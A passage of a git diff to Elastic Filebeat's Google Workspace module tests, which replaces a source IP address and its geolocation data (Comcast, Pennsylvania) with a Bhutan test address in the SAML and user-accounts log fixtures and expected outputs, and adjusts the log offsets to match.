-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json
index d6f84e5c64fc..c7a292fcd225 100644
--- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json
@@ -9,7 +9,7 @@
 "event.dataset": "google_workspace.saml",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
 "event.outcome": "failure",
 "event.provider": "saml",
 "event.type": [
@@ -30,23 +30,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -68,7 +64,7 @@
 "event.dataset": "google_workspace.saml",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
 "event.outcome": "success",
 "event.provider": "saml",
 "event.type": [
@@ -84,26 +80,22 @@
 "google_workspace.saml.orgunit_path": "ounit",
 "google_workspace.saml.status_code": "SUCCESS_URI",
 "input.type": "log",
- "log.offset": 622,
+ "log.offset": 621,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log
index 7da8fdec9353..230deadf26e7 100644
--- a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_disable"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_enroll"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"password_change","name":"password_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_email_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_enroll"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_unenroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_disable"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_enroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"password_change","name":"password_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_email_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_enroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_unenroll"}}
diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json
index cce07c42cf24..17525548f367 100644
--- a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -23,23 +23,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -60,7 +56,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -72,26 +68,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 316,
+ "log.offset": 315,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -112,7 +104,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -124,26 +116,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 631,
+ "log.offset": 629,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -164,7 +152,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -176,26 +164,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 954,
+ "log.offset": 951,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -216,7 +200,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -228,26 +212,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1288,
+ "log.offset": 1284,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -268,7 +248,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -280,26 +260,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1622,
+ "log.offset": 1617,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -320,7 +296,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -332,26 +308,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1960,
+ "log.offset": 1954,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -372,7 +344,7 @@
 "event.dataset": "google_workspace.user_accounts",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}",
 "event.provider": "user_accounts",
 "event.type": [
 "change",
@@ -384,26 +356,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2285,
+ "log.offset": 2278,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
